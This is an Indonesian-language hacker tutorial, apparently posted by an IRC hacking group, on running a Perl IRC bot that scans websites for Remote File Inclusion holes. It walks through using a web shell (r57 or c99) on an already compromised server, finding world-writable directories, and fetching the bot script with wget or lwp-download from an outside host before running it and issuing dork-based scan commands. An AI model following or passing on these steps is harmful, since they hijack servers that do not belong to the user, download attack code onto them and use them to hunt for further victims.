Kembali Lagi Ketemu Ma Gwe.. Bikin Tutorial Lagi Neh, Masih Ajah Ada yang Request Tentang ini..

“Gimana cara bikin bot scanner om?” Katanya di #BINUSHACKER @ IRC.DAL.NET

Masya Allah, cape deh.. Hare gene masih scan? Kzkzkz.. Btw, karena udah janji ni ane bikinin tutorialnya segala macem scanner.. Kzkzkz..

Silakan Bisa Dipake :)

Tapi jangan lupa settingny ya, coz dah ada yang gw udah rubah:

Download / List Scanner dibawah ini:

Silakan Klick Disini Aje Untuk List / Download

Oke klo udah loe setting setting smuanya:

Cara jalaninya mudah.. Ikutin Step By Step berikut ini

1. Copy paste dan simpan script yang Gwe beri di geocities ato web anda kedalam
format txt, ato anda juga bisa langsung menggunakan milik Gwe

2. Masuk ke shell anda – Siapin cemilan dolo.. Byr enakan dikit

3. Cari direktori yang memberikan permission 777 dengan command: find / -perm 777 -type d

4. Jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp

5. Wget script bot dari web geocities Gwe ato dari tempat anda. Gwe pake contoh punya rekan Gwe, jadi commandnya: wget http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt

6. Jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya: lwp-download http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt

7. Kalo ga bisa juga, pakailah fitur uploadnya karena Gwe menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt

8. Gwe anggep script tersebut udah di upload ye! Jalaninya gampang, perintahnya: perl scanner.txt

9. Jika berhasil, bot langsung join di channel loe.

10. Abis itu tinggal ketik seperti biasa: !scan bugnya dorknya   contoh: !scan index.php?page= index.php?page=

11. Silahkan tunggu ampe targetnya ketemu.. Kekeke.. Enjoy dah xD

KETERANGAN:
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject & buad di IRC
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas harap diperhatikan

SEMOGA BERMANFAAT DAH..
JANGAN LUPA Visit Us di #BINUSHACKER @ IRC.DAL.NET
KLO MASIH ADA PERTANYAAN – BINUSHACKER TEAM YANG LAEN SIAP MEMBANTU ANDA

==== EOF ====

Utuh Wibowo